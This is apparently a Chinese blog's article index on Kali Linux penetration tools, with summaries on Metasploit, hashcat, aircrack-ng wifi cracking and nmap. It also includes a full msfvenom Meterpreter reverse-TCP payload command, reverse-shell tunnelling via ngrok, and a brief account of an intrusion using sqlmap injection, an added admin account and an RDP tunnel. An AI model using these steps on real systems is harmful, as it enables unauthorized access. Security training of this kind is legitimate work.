kali linux
文章平均质量分 63
丢了少年失了心1
网络安全导师
展开
-
msf 渗透基础篇(基本命令)
以 kali 为例,几个关键路径,熟悉一下,为了更方便的查找。原创 2023-07-30 23:07:48 · 2219 阅读 · 3 评论 -
【Kali Linux工具篇】wpscan的基本介绍与使用
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。原创 2024-05-13 14:15:14 · 362 阅读 · 0 评论 -
【Kali Linux工具篇】Hashcat的基本介绍与使用
Hashcat是自称世界上最快的密码恢复工具。它在2015年之前拥有专有代码库,但现在作为免费软件发布。适用于Linux,OS X和Windows的版本可以使用基于CPU或基于GPU的变体。支持hashcat的散列算法有Microsoft LM哈希,MD4,MD5,SHA系列,Unix加密格式,MySQL和Cisco PIX等。GPU的驱动要求最新版hashcat下载地址:https://hashcat.net/files/hashcat-5.1.0.7z。原创 2024-05-11 14:15:53 · 1103 阅读 · 1 评论 -
【Kali Linux工具篇】hash-identifier的妙用
hash-identifier是一款可以识别hash加密类型的工具,由Python编写,并已经被集成在Kali Linux中。该工具的主要作用是帮助用户判断一串密文的加密方式,从而进行后续的破解或分析。hash-identifier只能识别hash加密类型,并不能直接破解密码。如果需要破解密码,还需要结合其他工具和方法进行(例如 hashcat 等)原创 2024-05-11 11:02:27 · 192 阅读 · 2 评论 -
【Kali Linux工具篇】使用Aircrack-ng破解wifi密码
1、一个无线网卡2、密钥爆破字典。原创 2024-05-08 12:00:59 · 468 阅读 · 0 评论 -
【运维基础一】 Linux Centos 常用命令
CentOS(Community ENTerprise Operating System)是一个基于Red Hat Enterprise Linux源代码构建的开源企业级Linux发行版。在CentOS系统中,有很多常用的命令可以帮助用户进行系统管理、文件操作、网络配置等任务。原创 2024-04-18 09:11:37 · 942 阅读 · 0 评论 -
【传送点】上千漏洞复现复现集合 exp poc 持续更新
【漏洞复现】OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现【漏洞复现】熊海cms 存在sql注入 附poc【漏洞复现】Array VPN任意文件读取漏洞【漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 附POC【漏洞复现】金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC【漏洞复现】DPTech VPN存在任意文件读取漏洞。原创 2023-11-28 20:18:11 · 3831 阅读 · 6 评论 -
记一次渗透测试事件
进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限。3 、发现是管理员权限,直接加账号,如果不上,可以考虑通过msf 或是cs去提权。5 、尝试通过frp或者其他工具将其3389端口转发出来,再进行连接。4 、查询发现3389端口是开的,但是连接不上,考虑可能是在内网。nc shell下加账号和密码成功,mstsc远程连接发现失败。拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入。直接在目标机上用爆出来的密码尝试远程登录,成功登录。接下来进行mstsc远程连接。原创 2023-10-24 20:09:21 · 168 阅读 · 0 评论 -
【Kali Linux工具篇】nmap的基本使用
Nmap是Network Mapper的简称。Nmap是一款免费、开源的网络发现和侦察工具。Nmap可以扫描网络中的处于活动状态的主机、开放端口、操作系统版本和服务检测以及执行隐匿方式的信息扫描。原创 2023-09-19 18:36:13 · 1388 阅读 · 0 评论 -
Kali Linux基础篇(一) 信息收集
详细的介绍可以查看:https://www.ietf.org/rfc/rfc3912.txt该工具可以获取目标站点的DNS服务器信息,域名注册基本信息。不要小看这些信息,任何一个都有可能在后期的测试阶段发挥作用。域名信息收集完成,接下来介绍一个收集DNS服务器信息的工具。原创 2023-09-13 10:54:05 · 385 阅读 · 0 评论 -
在安卓手机搭建kali环境,手机变成便携式渗透神器
kali是著名的黑客专用系统,一般都是直接装在物理机或者虚拟机上,我们可以尝试把kali安装在手机上,把手机打造成一个便携式渗透神器。我们需要下载以下3款软件:(1).Termux(终端模拟器)(2).AnLinux(里边有各种安装liunx的命令)(3).vnc view(远程控制客户端)下载地址点击下载 密码6fwp。原创 2023-07-10 10:18:34 · 3677 阅读 · 0 评论 -
内网kali 通过内网穿透反弹shell
通常我们kali都是安装在虚拟机上的,且在内网,但是通常在真实的渗透测试中,我们的kali需要有个公网ip来反弹shell,如何实现呢,接下来就给大家介绍一款我常用的工具。1、https://console.uulap.com/ 注册登录控制台。可以看到,shell已经成功反弹回来了。尝试通过nc 反弹获取shell。2、如图开通一个免费的隧道。看到下图,说明已经映射成功。3.在kali下载客户端。本地监听4444端口。原创 2023-05-21 17:06:38 · 1023 阅读 · 3 评论 -
内网kali 通过ngrok穿透反弹shell
1、在ngrok注册账号,并且开通免费隧道(网址:https://www.ngrok.cc)这里我kali的内网ip地址是10.10.10.1312、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html)解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件3...原创 2019-08-05 21:28:23 · 7516 阅读 · 12 评论 -
kali下msf提权
生成木马Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe配置监听程序Msfconsole 打开Metaploitmsf > use exploit/multi/handlers...原创 2018-09-23 16:07:28 · 4673 阅读 · 0 评论 -
metasploitable2更改root密码
因为msfadmin具有sudo权限,所以可以直接这样msfadmin@metasploitable:~$ sudo passwd root[sudo] password for msfadmin: #这里输入msfadmin的密码,也就是msfadminEnter new UNIX password: #这里输两次要更改的root的密码R...转载 2019-07-28 23:17:32 · 492 阅读 · 0 评论 -
Kali linux 静态ip和动态ip设置
ifconfig 查看当前网卡service networking stop 停止当前网卡网络服务vi /etc/network/interfaces 对网卡配置进行修改Esc键 :wq 进行保存重启网络服务 service networking restart...原创 2018-10-14 13:30:47 · 23658 阅读 · 7 评论